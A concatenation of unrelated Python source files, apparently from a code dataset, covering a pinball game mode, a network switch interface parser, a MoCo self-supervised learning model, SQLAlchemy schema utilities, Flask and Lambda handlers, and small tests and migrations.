def end_save(self):
# a ball saver to allow for reacclimation
if self.game.user_settings['Gameplay (Feature)']['Drunk Multiball End Saver'] == 'Enabled':
self.game.trough.start_ball_save(num_balls_to_save=1, time=8, now=True, allow_multiple_saves=False)
self.end_drunk()
def end_drunk(self):
#print "ENDING DRUNK MULTIBALL"
self.running = False
self.wipe_delays()
self.clear_layer()
# turn off the beer mug
self.game.lamps.beerMug.disable()
# update the tracking
self.game.set_tracking('drunkMultiballStatus', "OPEN")
# reset the flippers
self.game.enable_inverted_flippers(False)
self.game.enable_flippers(True)
# reset the lamps
self.lamp_update()
# clear the layer
self.layer = None
# turn the GI back on
self.game.gi_control("ON")
# reset the mug hits for next time
self.game.set_tracking('beerMugHits',0)
# set the stack flag back off
self.game.stack_level(3,False)
# kill the music
#self.stop_music(slice=4)
# restat the main music - if balls still in play
#if self.game.trough.num_balls_in_play > 0:
self.music_on(self.game.assets.music_mainTheme,mySlice=4)
# tick up the shots needed for next time
self.game.increase_tracking('mug_shots', self.game.user_settings['Gameplay (Feature)']['Beer Mug Hits Boost'])
# remove the switch blocker
self.game.switch_blocker('remove',self.myID)
self.game.base.busy = False
self.game.base.queued -= 1
# unload the mode
self.unload()
def tilted(self):
if self.running:
# update the tracking
self.game.set_tracking('drunkMultiballStatus', "OPEN")
# reset the mug hits for next time
self.game.set_tracking('beerMugHits',0)
# tick up the shots needed for next time
self.game.increase_tracking('mug_shots', self.game.user_settings['Gameplay (Feature)']['Beer Mug Hits Boost'])
self.running = False
self.unload()
| StarcoderdataPython |
84741 | # -*- coding: utf-8 -*-
import re
import json
from pprint import pformat
from pynetworking.Feature import Feature
try:
from collections import OrderedDict
except ImportError: # pragma: no cover
from ordereddict import OrderedDict
class ats_interface(Feature):
"""
Interface feature implementation for ATS
"""
def __init__(self, device, **kvargs):
Feature.__init__(self, device, **kvargs)
self._interface_config = {}
self._interface = {}
def load_config(self, config):
self._device.log_info("load_config")
self._device.log_debug("Loading config for ats_interface {0}".format(config))
self._interface_config = OrderedDict()
# 1/e1 100M-Copper Full 100 Enabled Off Up Disabled Auto
ifre = re.compile('(?P<stack_no>\d)/(?P<ifp>[eg])(?P<ifn>\d+)\s+'
'(?P<type>[^\s]+)\s+'
'(?P<configured_duplex>[^\s]+)\s+'
'(?P<configured_speed>[^\s]+)\s+'
'(?P<negotiation>[^\s]+)\s+'
'(?P<flow_control>[^\s]+)\s+'
'(?P<enable>(Up|Down))\s+'
'(?P<back_pressure>[^\s]+)\s+'
'(?P<configured_polarity>[^\s]+)\s+')
for line in self._device.cmd("show interfaces configuration").split('\n'):
m = ifre.match(line)
if m:
if m.group('configured_speed') == '--':
continue
ifn = int(m.group('ifn'))
if self._device.facts['model'] == 'AT-8000S/24' and m.group('ifp') == 'g':
ifn += 24
elif self._device.facts['model'] == 'AT-8000S/48' and m.group('ifp') == 'g':
ifn += 48
ifn = '{0}.0.{1}'.format(m.group('stack_no'), ifn)
if m.group('enable') == 'Up':
enable = True
else:
enable = False
self._interface_config[ifn] = {'enable': enable,
'configured_speed': m.group('configured_speed'),
'configured_duplex': m.group('configured_duplex').lower(),
'configured_polarity': m.group('configured_polarity').lower(),
}
ifre = re.compile('(?P<stack_no>\d)/(?P<ifp>[eg])(?P<ifn>\d+)\s+'
'(?P<description>[ \w\_]+)')
for line in self._device.cmd("show interfaces description").split('\n'):
m = ifre.match(line)
if m and m.group('description') != '':
# self._device.log_debug("description for {0} is '{1}'".format(ifn, m.group('description')))
ifn = int(m.group('ifn'))
if self._device.facts['model'] == 'AT-8000S/24' and m.group('ifp') == 'g':
ifn += 24
elif self._device.facts['model'] == 'AT-8000S/48' and m.group('ifp') == 'g':
ifn += 48
ifn = '{0}.0.{1}'.format(m.group('stack_no'), ifn)
if ifn in self._interface_config:
self._interface_config[ifn]['description'] = m.group('description')
self._device.log_debug("Configuration {0}".format(pformat(json.dumps(self._interface_config))))
def update(self, ifn, **kwargs):
self._device.log_info("update {0} {1}".format(ifn, pformat(kwargs)))
self._update_interface()
if ifn not in self._interface.keys():
raise ValueError('interface {0} does not exist'.format(ifn))
cmds = {'cmds': [{'cmd': 'conf', 'prompt': '\(config\)\#'},
{'cmd': 'interface ethernet ' + self._to_ifn_native(ifn), 'prompt': '\(config-if\)\#'},
]}
run_cmd = False
if 'description' in kwargs:
description = kwargs['description']
if ' ' in description:
description = '"{0}"'.format(description)
if 'description' in self._interface[ifn] and self._interface[ifn]['description'] == description:
return
run_cmd = True
cmds['cmds'].append({'cmd': 'description {0}'.format(description), 'prompt': '\(config-if\)\#'})
if run_cmd:
cmds['cmds'].append({'cmd': chr(26), 'prompt': '\#'})
self._device.cmd(cmds, cache=False, flush_cache=True)
self._device.load_system()
def items(self):
self._update_interface()
return self._interface.items()
def keys(self):
self._update_interface()
return self._interface.keys()
def __str__(self):
self._update_interface()
return json.dumps(self._interface)
__repr__ = __str__ # pragma: no cover
def __getitem__(self, ifn):
if isinstance(ifn, str):
self._update_interface()
if ifn in self._interface:
return self._interface[ifn]
raise KeyError('interface {0} does not exist'.format(ifn))
else:
raise TypeError("invalid argument type")
def __iter__(self):
self._update_interface()
for interface in self._interface:
yield interface
def _update_interface(self):
self._device.log_info("_update_interface")
self._interface = OrderedDict()
# 1/e1 100M-Copper Full 100 Enabled Off Up Disabled Off
ifre = re.compile('(?P<stack_no>\d)/(?P<ifp>[eg])(?P<ifn>\d+)\s+'
'(?P<type>[^\s]+)\s+'
'(?P<current_duplex>[^\s]+)\s+'
'(?P<current_speed>[^\s]+)\s+'
'(?P<negotiation>[^\s]+)\s+'
'(?P<flow_control>[^\s]+)\s+'
'(?P<link>(Up|Down))\s+'
'(?P<current_polarity>[^\s]+)\s+'
'[^\n]+')
for line in self._device.cmd("show interfaces status").split('\n'):
m = ifre.match(line)
if m:
ifn = int(m.group('ifn'))
if self._device.facts['model'] == 'AT-8000S/24' and m.group('ifp') == 'g':
ifn += 24
elif self._device.facts['model'] == 'AT-8000S/48' and m.group('ifp') == 'g':
ifn += 48
ifn = '{0}.0.{1}'.format(m.group('stack_no'), ifn)
if m.group('link') == 'Up':
if m.group('current_polarity') == 'Off':
self._interface[ifn] = {'link': True,
'current_speed': m.group('current_speed'),
'current_duplex': m.group('current_duplex').lower(),
'current_polarity': 'mdi'
}
else:
self._interface[ifn] = {'link': False,
'current_speed': m.group('current_speed'),
'current_duplex': m.group('current_duplex').lower(),
'current_polarity': 'mdix'
}
else:
self._interface[ifn] = {'link': False}
self._interface[ifn] = dict(self._interface[ifn].items() + self._interface_config[ifn].items())
self._device.log_debug("Status {0}".format(pformat(json.dumps(self._interface))))
def _to_ifn_native(self, ifn):
self._device.log_info("_to_ifn_native " + ifn)
stack_no = ifn.split('.')[0]
if_no = int(ifn.split('.')[2])
if self._device.facts['model'] == 'AT-8000S/24' and if_no > 24:
return "{0}/g{1}".format(stack_no, if_no - 24)
elif self._device.facts['model'] == 'AT-8000S/48'and if_no > 48:
return "{0}/g{1}".format(stack_no, if_no - 48)
else:
return "{0}/e{1}".format(stack_no, if_no)
| StarcoderdataPython |
1603144 | #!/usr/bin/env python
"""
KDE_parse: parse out KDEs for certain taxa
Usage:
KDE_parse [options] <kde> <taxa>
KDE_parse -h | --help
KDE_parse --version
Options:
<kde> Pickled KDE object.
('-' if input from STDIN)
<taxa> List of taxa used for parsing (one name per line).
Anything following a <tab> will be ignored.
-h --help Show this screen.
--version Show version.
--debug Debug mode
Description:
Sample values from each KDE in the pickled KDE object
and produce a table of values.
Output
------
Tab-delim file: <taxon><tab><value>
"""
# import
## batteries
from docopt import docopt
import sys,os
## 3rd party
import pandas as pd
import dill
## application libraries
from SIPSim import Utils
def load_taxa(inFile):
"""Loading a file listing taxa names.
"""
taxa = []
with open(inFile, 'rb') as inFH:
for line in inFH:
line = line.rstrip().split('\t')
taxa.append(line[0])
return taxa
return kde_type
def main(args=None):
# loading taxa names
taxa = load_taxa(args['<taxa>'])
# loading KDEs
KDEs = Utils.load_kde(args['<kde>'])
# parsing KDEs
kde_type = Utils.KDE_type(KDEs)
# parsing KDE
if kde_type == 1:
KDEs_p = [[t,k] for t,k in KDEs if t in taxa]
elif kde_type == 2:
KDEs_p = {t:k for t,k in KDEs.items() if t in taxa}
elif kde_type == 3:
KDEs_p = {}
for libID,v in KDEs_p.items():
KDEs_pp = {t:k for t,k in v.items() if t in taxa}
KDEs_p[libID] = KDEs_pp
KDEs_pp = None
elif kde_type == 4:
KDEs_p = {}
for libID,filename in KDEs.items():
KDE_bylib = Utils.load_kde(filename)
KDE_bylib = {t:k for t,k in KDE_bylib.items() if t in taxa}
KDEs_p[libID] = KDE_bylib
KDE_bylib = None
else:
raise TypeError, 'KDE object type not recognized'
# writing
dill.dump(KDEs_p, sys.stdout)
def opt_parse(args=None):
if args is None:
args = docopt(__doc__, version='0.1')
else:
args = docopt(__doc__, version='0.1', argv=args)
main(args)
| StarcoderdataPython |
1719956 | from threading import Lock
from mesh.standard import OperationError, ValidationError
from scheme import Boolean, Text
from scheme.supplemental import ObjectReference
from sqlalchemy import MetaData, Table, create_engine, event
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.orm.session import Session, sessionmaker
from spire.core import *
from spire.local import ContextLocals
from spire.schema.dialect import get_dialect
from spire.schema.migration import MigrationInterface
from spire.util import get_package_path
__all__ = ('OperationError', 'Schema', 'SchemaDependency', 'SchemaInterface', 'ValidationError')
SessionLocals = ContextLocals.create_prefixed_proxy('schema.session')
class EnhancedSession(Session):
def call_after_commit(self, function, *args, **params):
try:
nested_calls = self._call_after_commit[-1]
except (AttributeError, IndexError):
self._call_after_commit = [[(function, args, params)]]
else:
nested_calls.append((function, args, params))
def close(self):
super(EnhancedSession, self).close()
try:
del self._call_after_commit
except AttributeError:
pass
def begin_nested(self):
try:
calls = self._call_after_commit
except AttributeError:
calls = self._call_after_commit = [[], []]
else:
calls.append([])
return super(EnhancedSession, self).begin_nested()
def commit(self):
super(EnhancedSession, self).commit()
try:
nested_calls = self._call_after_commit.pop()
except (AttributeError, IndexError):
return
for function, args, params in nested_calls:
function(*args, **params)
def rollback(self):
super(EnhancedSession, self).rollback()
try:
self._call_after_commit.pop()
except (AttributeError, IndexError):
pass
class Schema(object):
"""A spire schema."""
guard = Lock()
schemas = {}
def __new__(cls, name):
cls.guard.acquire()
try:
try:
return cls.schemas[name]
except KeyError:
instance = cls.schemas[name] = super(Schema, cls).__new__(cls)
instance.constructors = []
instance.name = name
instance.metadata = MetaData()
SchemaDependency.register(name)
SessionLocals.declare(name)
return instance
finally:
cls.guard.release()
def constructor(self):
def decorator(function):
self.constructors.append(function)
return function
return decorator
@classmethod
def interface(cls, name):
return SchemaDependency(name).get()
class SchemaInterface(Unit):
configuration = Configuration({
'admin_url': Text(nonnull=True),
'echo': Boolean(default=False),
'hstore': Boolean(default=False),
'migrations': Text(nonnull=True),
'schema': Text(nonempty=True),
'url': Text(nonempty=True),
})
def __init__(self, schema, url):
if isinstance(schema, basestring):
schema = Schema.schemas[schema]
params = {'hstore': self.configuration.get('hstore', False)}
self.dialect = get_dialect(url, **params)
self.cache = {}
self.guard = Lock()
self.schema = schema
self.url = url
@property
def session(self):
return self.get_session()
def construct_model(self, base, tablename, attributes, title=None, **params):
params.update(schema=self.schema, tablename=tablename)
meta = type('meta', (), params)
attributes.update(meta=meta)
return type(str(title or tablename), (base,), attributes)
def create_or_update_table(self, table, **tokens):
engine = self.get_engine(**tokens)
try:
additions, removals = self._collate_column_changes(engine, table)
if not additions and not removals:
return
except NoSuchTableError:
table.create(engine)
return
sql = self.dialect.construct_alter_table(table.name, additions, removals)
engine.execute(sql)
def create_schema(self, **tokens):
url = self._construct_url(tokens)
name = url.split('/')[-1]
admin_url = self.configuration.get('admin_url')
self.dialect.create_database(admin_url, name)
engine, sessions = self._acquire_engine(tokens)
self.schema.metadata.create_all(engine)
migrations = self._get_migration_interface()
if migrations and migrations.has_revisions:
migrations.stamp()
def deploy_schema(self, **tokens):
url = self._construct_url(tokens)
name = url.split('/')[-1]
admin_url = self.configuration.get('admin_url')
if self.dialect.is_database_present(admin_url, name):
migrations = self._get_migration_interface()
if migrations and migrations.has_revisions:
migrations.upgrade()
else:
self.create_schema(**tokens)
constructors = self.schema.constructors
if not constructors:
return
engine, sessions = self._acquire_engine(tokens)
session = sessions()
try:
for constructor in constructors:
constructor(session)
finally:
session.close()
def drop_schema(self, **tokens):
url = self._construct_url(tokens)
name = url.split('/')[-1]
admin_url = self.configuration.get('admin_url')
if admin_url:
self.dialect.drop_database(admin_url, name)
def drop_table(self, table, **tokens):
engine, sessions = self._acquire_engine(tokens)
table.drop(engine)
def drop_tables(self, **tokens):
engine, sessions = self._acquire_engine(tokens)
self.schema.metadata.drop_all(engine)
def enumerate_tables(self, **tokens):
engine, sessions = self._acquire_engine(tokens)
inspector = Inspector.from_engine(engine)
return inspector.get_table_names()
def get_engine(self, **tokens):
engine, sessions = self._acquire_engine(tokens)
return engine
def get_session(self, independent=False, **tokens):
if independent:
engine, sessions = self._acquire_engine(tokens)
return sessions()
session = SessionLocals.get(self.schema.name)
if session:
return session
engine, sessions = self._acquire_engine(tokens)
session = sessions()
return SessionLocals.push(self.schema.name, session, session.close)
def is_table_correct(self, table, **tokens):
engine = self.get_engine(**tokens)
try:
additions, removals = self._collate_column_changes(engine, table)
return (not additions and not removals)
except NoSuchTableError:
return False
def lock_tables(self, session, tables, mode='share row exclusive'):
if isinstance(tables, basestring):
tables = [tables]
for tablename in tables:
session.execute(self.dialect.construct_lock_table(tablename, mode))
def purge(self):
self.guard.acquire()
try:
for engine, sessions in self.cache.itervalues():
engine.dispose()
self.cache = {}
finally:
self.guard.release()
def table_exists(self, table, **tokens):
engine, sessions = self._acquire_engine(tokens)
return table.exists(engine)
def _acquire_engine(self, tokens=None):
url = self._construct_url(tokens)
try:
return self.cache[url]
except KeyError:
pass
self.guard.acquire()
try:
if url in self.cache:
return self.cache[url]
engine, sessions = self._create_engine(url)
self.cache[url] = (engine, sessions)
return engine, sessions
finally:
self.guard.release()
def _collate_column_changes(self, engine, table):
inspector = Inspector.from_engine(engine)
columns = {}
for column in Inspector.from_engine(engine).get_columns(table.name):
columns[column['name']] = column
additions = []
removals = []
for column in table.columns:
existing = columns.get(column.name)
if existing is not None:
if self.dialect.type_is_equivalent(column.type, existing['type']):
continue
else:
removals.append(column)
additions.append(column)
for name in columns:
if name not in table.columns:
removals.append(name)
return additions, removals
def _construct_url(self, tokens=None):
url = self.url
if tokens:
url = url % tokens
return url
def _create_engine(self, url):
echo = self.configuration.get('echo')
if echo:
echo = 'debug'
engine = self.dialect.create_engine(url, self.schema, echo=echo)
return engine, sessionmaker(bind=engine, class_=EnhancedSession)
def _get_migration_interface(self):
migrations = self.configuration.get('migrations')
if migrations:
return MigrationInterface(self.schema, get_package_path(migrations))
class SchemaDependency(Dependency):
def __init__(self, schema, **params):
self.schema = schema
super(SchemaDependency, self).__init__(SchemaInterface, 'schema:%s' % schema, **params)
def contribute_params(self):
return {'schema': self.schema}
| StarcoderdataPython |
3270455 | <gh_stars>0
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.distributed as dist
from openselfsup.utils import print_log
from . import builder
from .registry import MODELS
from openselfsup.datasets import viz_utils
import random
import wandb
# TODO(cjrd) use this across all classes?
train_images_sent_to_wandb = False
class BaseModel(nn.Module):
def __init__(self):
super(BaseModel, self).__init__()
self.debug = False
def set_debug(self):
self.debug = True
def train_step(self, data, optimizer, **kwargs):
losses = self(**data)
loss, log_vars = self._parse_losses(losses)
if 'img' in data:
nimg = len(data['img'].data)
else:
nimg = len(data['img_q'].data)
# Send a random image pair to wandb within this batch
# The following is commented out as the data shape is the same as that the one are showing in wandb after the pipeline
# global train_images_sent_to_wandb
# try:
# # Here nimg represents a batch (default 64)
# if train_images_sent_to_wandb == False:
# rand_index = random.randint(0, nimg - 1)
# # The image data we get is a torch.Tensor
# # Type of data['img_q'].data[rand_index]: <class 'torch.Tensor'> Shape is torch.Size([10, 256, 256])
# # Type of data['img_k'].data[rand_index]: <class 'torch.Tensor'> Shape is torch.Size([2, 256, 256])
#
# plt = viz_utils.read_msi_as_plt(data['img_k'].data[rand_index], data['img_q'].data[rand_index])
# wandb.log({'Images during train step': plt})
# train_images_sent_to_wandb = True
#
# except Exception as e: print(e)
outputs = dict(loss=loss, log_vars=log_vars,
num_samples=nimg)
return outputs
def eval_step(self, data, optimizer, **kwargs):
losses = self(**data)
loss, log_vars = self._parse_losses(losses)
if 'img' in data:
nimg = len(data['img'].data)
else:
nimg = len(data['img_q'].data)
outputs = dict(loss=loss, log_vars=log_vars,
num_samples=nimg)
return outputs
def val(self, data, optimizer, **kwargs):
losses = self(**data)
loss, log_vars = self._parse_losses(losses)
if 'img' in data:
nimg = len(data['img'].data)
else:
nimg = len(data['img_q'].data)
outputs = dict(loss=loss, log_vars=log_vars,
num_samples=nimg)
return outputs
def _parse_losses(self, losses):
"""Parse the raw outputs (losses) of the network.
Args:
losses (dict): Raw output of the network, which usually contain
losses and other necessary infomation.
Returns:
tuple[Tensor, dict]: (loss, log_vars), loss is the loss tensor \
which may be a weighted sum of all losses, log_vars contains \
all the variables to be sent to the logger.
"""
log_vars = OrderedDict()
for loss_name, loss_value in losses.items():
if isinstance(loss_value, torch.Tensor):
log_vars[loss_name] = loss_value.mean()
elif isinstance(loss_value, list):
log_vars[loss_name] = sum(_loss.mean() for _loss in loss_value)
else:
raise TypeError(
f'{loss_name} is not a tensor or list of tensors')
loss = sum(_value for _key, _value in log_vars.items()
if 'loss' in _key)
log_vars['loss'] = loss
for loss_name, loss_value in log_vars.items():
# reduce loss when distributed training
if dist.is_available() and dist.is_initialized():
loss_value = loss_value.data.clone()
dist.all_reduce(loss_value.div_(dist.get_world_size()))
log_vars[loss_name] = loss_value.item()
return loss, log_vars
@MODELS.register_module
class MOCO(BaseModel):
"""MOCO.
Implementation of "Momentum Contrast for Unsupervised Visual
Representation Learning (https://arxiv.org/abs/1911.05722)".
Part of the code is borrowed from:
"https://github.com/facebookresearch/moco/blob/master/moco/builder.py".
Args:
backbone (dict): Config dict for module of backbone ConvNet.
neck (dict): Config dict for module of deep features to compact feature vectors.
Default: None.
head (dict): Config dict for module of loss functions. Default: None.
pretrained (str, optional): Path to pre-trained weights. Default: None.
queue_len (int): Number of negative keys maintained in the queue.
Default: 65536.
feat_dim (int): Dimension of compact feature vectors. Default: 128.
momentum (float): Momentum coefficient for the momentum-updated encoder.
Default: 0.999.
"""
def __init__(self,
backbone,
input_module_q=None,
input_module_k=None,
random_swap_q_k=False,
neck=None,
head=None,
pretrained=None,
queue_len=65536,
feat_dim=128,
momentum=0.999,
**kwargs):
super(MOCO, self).__init__()
# Allow for multi-band input
self.input_module_q=builder.build_input_module(input_module_q)
self.input_module_k=builder.build_input_module(input_module_k)
self.random_swap_q_k = random_swap_q_k
self.encoder_q = nn.Sequential(
builder.build_backbone(backbone), builder.build_neck(neck))
self.encoder_k = nn.Sequential(
builder.build_backbone(backbone), builder.build_neck(neck))
self.backbone = self.encoder_q[0]
for param in self.encoder_k.parameters():
param.requires_grad = False
self.head = builder.build_head(head)
self.init_weights(pretrained=pretrained)
self.queue_len = queue_len
self.momentum = momentum
# create the queue
self.register_buffer("queue", torch.randn(feat_dim, queue_len))
self.queue = nn.functional.normalize(self.queue, dim=0)
self.register_buffer("queue_ptr", torch.zeros(1, dtype=torch.long))
def init_weights(self, pretrained=None):
"""Initialize the weights of model.
Args:
pretrained (str, optional): Path to pre-trained weights.
Default: None.
"""
if pretrained is not None:
print_log('load model from: {}'.format(pretrained), logger='root')
self.encoder_q[0].init_weights(pretrained=pretrained)
self.encoder_q[1].init_weights(init_linear='kaiming')
for param_q, param_k in zip(self.encoder_q.parameters(),
self.encoder_k.parameters()):
param_k.data.copy_(param_q.data)
@torch.no_grad()
def _momentum_update_key_encoder(self):
"""Momentum update of the key encoder."""
for param_q, param_k in zip(self.encoder_q.parameters(),
self.encoder_k.parameters()):
param_k.data = param_k.data * self.momentum + \
param_q.data * (1. - self.momentum)
@torch.no_grad()
def _dequeue_and_enqueue(self, keys):
"""Update queue."""
# gather keys before updating queue
if not self.debug:
keys = concat_all_gather(keys)
batch_size = keys.shape[0]
ptr = int(self.queue_ptr)
assert self.queue_len % batch_size == 0 # for simplicity
# replace the keys at ptr (dequeue and enqueue)
self.queue[:, ptr:ptr + batch_size] = keys.transpose(0, 1)
ptr = (ptr + batch_size) % self.queue_len # move pointer
self.queue_ptr[0] = ptr
@torch.no_grad()
def _batch_shuffle_ddp(self, x):
"""Batch shuffle, for making use of BatchNorm.
*** Only support DistributedDataParallel (DDP) model. ***
"""
# gather from all gpus
batch_size_this = x.shape[0]
x_gather = concat_all_gather(x)
batch_size_all = x_gather.shape[0]
num_gpus = batch_size_all // batch_size_this
# random shuffle index
idx_shuffle = torch.randperm(batch_size_all).cuda()
# broadcast to all gpus
torch.distributed.broadcast(idx_shuffle, src=0)
# index for restoring
idx_unshuffle = torch.argsort(idx_shuffle)
# shuffled index for this gpu
gpu_idx = torch.distributed.get_rank()
idx_this = idx_shuffle.view(num_gpus, -1)[gpu_idx]
return x_gather[idx_this], idx_unshuffle
@torch.no_grad()
def _batch_unshuffle_ddp(self, x, idx_unshuffle):
"""Undo batch shuffle.
*** Only support DistributedDataParallel (DDP) model. ***
"""
# gather from all gpus
batch_size_this = x.shape[0]
x_gather = concat_all_gather(x)
batch_size_all = x_gather.shape[0]
num_gpus = batch_size_all // batch_size_this
# restored index for this gpu
gpu_idx = torch.distributed.get_rank()
idx_this = idx_unshuffle.view(num_gpus, -1)[gpu_idx]
return x_gather[idx_this]
def forward_train(self, img=None, im_q=None, im_k=None, **kwargs):
"""Forward computation during training.
Args:
img (Tensor): Input of two concatenated images of shape (N, 2, C, H, W).
Typically these should be mean centered and std scaled.
Returns:
dict[str, Tensor]: A dictionary of loss components.
"""
if img is not None:
assert img.dim() == 5, \
"Input must have 5 dims, got: {}".format(img.dim())
if img is not None and im_q is None:
im_q = img[:, 0, ...].contiguous()
if img is not None and im_k is None:
im_k = img[:, 1, ...].contiguous()
# compute query features
if self.input_module_q is not None:
im_q = self.input_module_q(im_q)
if self.input_module_k is not None:
im_k = self.input_module_k(im_k)
# use images from both source in key and query
half_bsz = im_q.shape[0]//2
all_ims_qk = torch.cat([im_q[:half_bsz, ...], im_k[half_bsz:, ...]], dim=0)
all_ims_kq = torch.cat([im_k[:half_bsz, ...], im_q[half_bsz:, ...]], dim=0)
im_q = all_ims_qk
im_k = all_ims_kq
# randomly swap q and k to avoid alignment bias
if torch.rand(1).item() < 0.5:
tmp = im_k
im_k = im_q
im_k = tmp
q = self.encoder_q(im_q)[0] # queries: NxC
q = nn.functional.normalize(q, dim=1)
# compute key features
with torch.no_grad(): # no gradient to keys
self._momentum_update_key_encoder() # update the key encoder
# shuffle for making use of BN
if not self.debug:
im_k, idx_unshuffle = self._batch_shuffle_ddp(im_k)
k = self.encoder_k(im_k)[0] # keys: NxC
k = nn.functional.normalize(k, dim=1)
# undo shuffle
if not self.debug:
k = self._batch_unshuffle_ddp(k, idx_unshuffle)
# compute logits
# Einstein sum is more intuitive
# positive logits: Nx1
l_pos = torch.einsum('nc,nc->n', [q, k]).unsqueeze(-1)
# negative logits: NxK
l_neg = torch.einsum('nc,ck->nk', [q, self.queue.clone().detach()])
losses = self.head(l_pos, l_neg)
self._dequeue_and_enqueue(k)
return losses
def forward_test(self, img, **kwargs):
pass
def forward(self, img=None, img_q=None, img_k=None, mode='train', **kwargs):
"""
takes img (concat tensor of both images) or explicity img_q and img_k
"""
if mode == 'train':
return self.forward_train(img=img, im_q=img_q, im_k=img_k, **kwargs)
elif mode == 'test':
return self.forward_test(img=img, im_q=img_q, im_k=img_k, **kwargs)
elif mode == 'extract':
return self.backbone(img=img, im_q=img_q, im_k=img_k)
else:
raise Exception("No such mode: {}".format(mode))
# utils
@torch.no_grad()
def concat_all_gather(tensor):
"""Performs all_gather operation on the provided tensors.
*** Warning ***: torch.distributed.all_gather has no gradient.
"""
tensors_gather = [
torch.ones_like(tensor)
for _ in range(torch.distributed.get_world_size())
]
torch.distributed.all_gather(tensors_gather, tensor, async_op=False)
output = torch.cat(tensors_gather, dim=0)
return output
| StarcoderdataPython |
61238 | # -*- encoding:utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
| StarcoderdataPython |
141077 | from __future__ import absolute_import
import unittest
import os
import torch
from torchvision import transforms
from data import data
from data import dataloaders
class test_data(unittest.TestCase):
def setUp(self):
self.path=os.getcwd() + '/data'
self.name='cifar10'
self.trans= transforms.Compose([transforms.RandomResizedCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor()])
def test_loading_cifar(self):
data_class = data.CIFAR(root=self.path, train=True, trans=self.trans, sample=None, name=self.name)
self.assertEqual(len(data_class), 50000)
self.assertTrue(isinstance(data_class[0][0], torch.Tensor))
self.assertTrue(isinstance(data_class[0][1], torch.Tensor))
def test_subsampling(self):
test_size = torch.randint(0, 50000, (1,))
data_class = data.CIFAR(root=self.path, train=True, trans=self.trans, sample=test_size, name=self.name)
for i in range(10):
index = torch.nonzero((data_class.label[data_class.index] == i)).flatten()
self.assertLessEqual(index.shape[0], test_size)
def test_dataloader(self):
# test loader
train, test = dataloaders.CIFARX(self.name, self.path)
self.assertIsNotNone(train)
self.assertIsNotNone(test)
def test_loading_rotMNIST(self):
datapath = os.getcwd() + '/data/mnist_all_rotation_normalized_float_test.amat'
data_class = data.ROTMNIST(datapath, trans= transforms.Compose([transforms.ToTensor(),
]))
self.assertEqual(len(data_class), 50000)
| StarcoderdataPython |
3306184 | from __future__ import absolute_import
from require.require import *
| StarcoderdataPython |
3212587 | <reponame>gitter-badger/LendIt
# -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-08-13 16:27
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('website', '0002_remove_lendituser_name'),
]
operations = [
migrations.CreateModel(
name='Borrowed',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('book', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='website.UserBook')),
('lender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='lender', to='website.LenditUser')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='borrower', to='website.LenditUser')),
],
),
migrations.RemoveField(
model_name='requestsent',
name='user',
),
migrations.RemoveField(
model_name='notification',
name='book_id',
),
migrations.AddField(
model_name='notification',
name='book',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='website.UserBook'),
preserve_default=False,
),
migrations.AlterField(
model_name='notification',
name='other_user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='other_user', to='website.LenditUser'),
),
migrations.AlterField(
model_name='notification',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='me_user', to='website.LenditUser'),
),
migrations.DeleteModel(
name='RequestSent',
),
]
| StarcoderdataPython |
1642063 | <reponame>FJOQWIERMDNKFAJ/khaiii
import json
from khaiii import KhaiiiApi
target_tags = ['NNG', 'NNP']
def parse(s):
api = KhaiiiApi()
gen = api.analyze(s)
for word in gen:
if hasattr(word, 'morphs'):
morphs = word.morphs
for morph in morphs:
yield [morph.lex, morph.tag]
def collect(inp):
output = set()
for lex, tag in parse(inp):
if tag in target_tags:
output.add(lex)
return output
def lambda_handler(event, context):
if event['isBase64Encoded']:
import base64
body = json.loads(base64.b64decode(event['body']).decode())
else:
body = json.loads(event['body'])
try:
inp = body['text']
out = collect(inp) # set[str]
o = {
'statusCode': 200,
'body': json.dumps({'nn': list(out)}),
'isBase64Encoded': False,
}
return o
except:
o = {
'statusCode': 400,
#'body': json.dumps(event),
'body': {'detail': 'bad request'},
'isBase64Encoded': False,
}
return o
| StarcoderdataPython |
1665780 | from flask import Blueprint, jsonify, make_response, request
from flask import current_app
from wlan_api.generate import generate_vouchers
shop = Blueprint('shop', __name__)
# https://pythonise.com/series/learning-flask/working-with-json-in-flask
@shop.route('/', methods=["GET"])
def example():
return jsonify({"message": "Request body must be JSON"}), 405
@shop.route('/getvoucher', methods=["GET"])
def example1():
return make_response(jsonify({"message": "Request body must be JSON"}), 405)
@shop.route("/json", methods=["POST"])
def example2():
if request.is_json:
req = request.get_json()
response_body = {
"message": "JSON received!",
"sender": req.get("name")
}
res = make_response(jsonify(response_body), 200)
return res
else:
return make_response(jsonify({"message": "Request body must be JSON"}), 405)
@shop.route("/vouchers", methods=["POST"])
def vouchers():
if request.is_json:
voucher_config = current_app.config['VOUCHER']
vouchers = generate_vouchers(10, 100, voucher_config['key'],
voucher_config['alphabet'],
voucher_config['length'])
res = make_response(jsonify(vouchers), 200)
return res
else:
return make_response(jsonify({"message": "Request body must be JSON"}), 405)
| StarcoderdataPython |
3227019 | <gh_stars>0
class Solution:
# @param s, a string
# @return an integer
def numDecodings(self, s):
codes = {i for i in range(1, 27)}
if not s or s[0] not in codes:
return 0
s = "0" + s
prev, current, nxt = 1, 1, 0
print s
for i in range(1, len(s)):
if s[i] in codes:
nxt = prev + current if s[i-1:i+1] in codes else current
else:
if s[i-1:i+1] in codes:
nxt = prev
else:
return 0
prev, current = current, nxt
return current
a = Solution()
print a.numDecodings("1") | StarcoderdataPython |
1758269 | import time
from threading import Lock
from .base_metric import BaseMetric
from ..stats.moving_average import ExpWeightedMovingAvg
class Meter(BaseMetric):
"""
A meter metric which measures mean throughput and one-, five-, and fifteen-minute
exponentially-weighted moving average throughputs.
"""
def __init__(self, key, clock=time, tags=None):
